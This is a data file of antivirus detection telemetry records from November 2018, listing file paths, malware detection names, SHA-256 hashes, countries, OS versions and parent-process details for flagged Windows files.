  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a49054639c4bd928956e159059359ef7acba9d28e739b00f44268e314ca03514', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A49054639C4BD928956E159059359EF7ACBA9D28E739B00F44268E314CA03514', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a49054639c4bd928956e159059359ef7acba9d28e739b00f44268e314ca03514', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverreviver.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverReviver.exe", filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverreviver.exe', filepath='F:\\HBCD\\Programs\\DriverReviver.exe', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081159-221a8ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081159-221A8FF5', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverreviver.exe', filepath='E:\\HBCD\\Programs\\DriverReviver.exe', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102044-a4fb6af1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102044-A4FB6AF1', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01022.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01022.exe', filesize=940000, name='HEUR/APC.#M1.#R1'), hash='a4d46903d000cf72dc5e395fb4a39d264005a6ae2dec2419166aec0fdfc64348', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082640-e9cee8a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8bcab153\\AVSCAN-20181102-082006-C777EAE1\\AVSCAN-20181102-082640-E9CEE8A2', filesize=640000, name='Adware/Strictor.61989.92.#M1.#R1'), hash='a4e7bac2d8ef25b8185a5e6a436126a805f55c3d4299e847eb5a8ad20877ed88', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.42\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='a513115e26ff7ca84d9e0b7865e13876b0dfc426d7e84287248a05623c67eda8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a52153d1258053141c602709f13091e0d88d222b27fae0267e45dc4cb0901351', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a54450a07b3902a64c3412b0ddd54ebaab627d053a397c243676c2c2d45f3cc9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A54450A07B3902A64C3412B0DDD54EBAAB627D053A397C243676C2C2D45F3CC9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a54450a07b3902a64c3412b0ddd54ebaab627d053a397c243676c2c2d45f3cc9', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='a56c31d4c25d9f8878b1a7162f9fd1f252eb7c75f326c8f3a1f749970dcfa811', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:47:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deviceeject.exe', filepath='d:\\windows\\system32\\DeviceEject.exe', filesize=576000, name='W32/Virut.Gen.#M1.#R1'), hash='a624427223958e30cf7a350661269c124454a2de40b7392a1e4fe0f18aee1412', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00005bd4', filepath='C:\\Windows\\Temp\\tmp0000550b\\tmp00005bd4', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='a649d85d0910f7561f31b0e9eaf8cb8977aafcc0aaa5fe72f90f5a7851ccf622', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T15:58:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141634-806568aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141634-806568AA', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141308-59d20d24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141308-59D20D24', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141623-7e5819cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141623-7E5819CD', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141612-7c30953e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141612-7C30953E', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141436-6a50781d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141436-6A50781D', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141439-6ad8ead0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141439-6AD8EAD0', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141447-6c4ff5bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141447-6C4FF5BB', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='berkelium.exe', filepath='\\\\?\\E:\\ShowDawZ\\berkelium.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='a681d3e41eded7b5c9bdce7ad04b17bb65a135cf9b7e9857e3c770410c74407d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered cinif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cinif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a6ffd8c8dd7444b7f4c9871851225d5f087825d9e75c992b12de2ce4fded8d8b', metadata=Row(cmdline='{6EB31869-6C48-47AE-8B63-06404A1DD15F} S-1-5-21-4176333140-843296748-4195629615-1000:Tom-PC\\\\\\\\Tom:Interactive:Highest[1]', country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T06:54:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:52:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T23:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a75634b8d79e8e2e610ab065000986efe474926bdfd12d657f507239610589a4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A75634B8D79E8E2E610AB065000986EFE474926BDFD12D657F507239610589A4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a75634b8d79e8e2e610ab065000986efe474926bdfd12d657f507239610589a4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\RemoteComputerManager.exe", filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083303-c39a8e73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083303-C39A8E73', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221436-57280493', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221436-57280493', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='E:\\HBCD\\Programs\\RemoteComputerManager.exe', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101919-9919cf58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101919-9919CF58', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\RemoteComputerManager.exe', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath='H:\\HBCD\\Programs\\REMOTECOMPUTERMANAGER.EXE', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221536-601d892d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221536-601D892D', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstall.exe', filepath='C:\\Users\\X\\AppData\\Local\\Chromium\\Application\\45.0.2422.0\\Installer\\uninstall.exe', filesize=960000, name='W32/Ramnit.CD.#M1.#R1'), hash='a827326619753b94dff2da67230725a0608964d1e771f58357406dcd4e0dc709', metadata=Row(cmdline='--engine=2 --session-id=73T0oNtQ1kqyOo1+zqVm4b0r+QolLIeok7bLq8NI --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T01:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='F:\\DATA.EXE', filesize=1600000, name='TR/Crypt.CFI.Gen.#M300.#R2273'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T16:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='F:\\DATA.EXE', filesize=1600000, name='TR/Crypt.CFI.Gen.#M300.#R2273'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T16:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194723-1005119e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72e4470\\AVSCAN-20181102-194642-0BCADECE\\AVSCAN-20181102-194723-1005119E', filesize=1600000, name='TR/Crypt.CFI.Gen.#M1.#R1'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='saper.exe', filepath='N:\\Disk D\\Restore\\Saper\\Saper.exe', filesize=896000, name='BDS/Hupigon.khxi.#M1.#R1'), hash='a883b670c9b5753f61478450b0f085a17d806088d9670199c5eb668f02b28baa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T16:52:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='a8ae308110f729e18a260b3a5211f5410e126fbac7235bc439fb148d7dd241c2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:07Z'), dt=datetime.date(2018, 11, 2)),
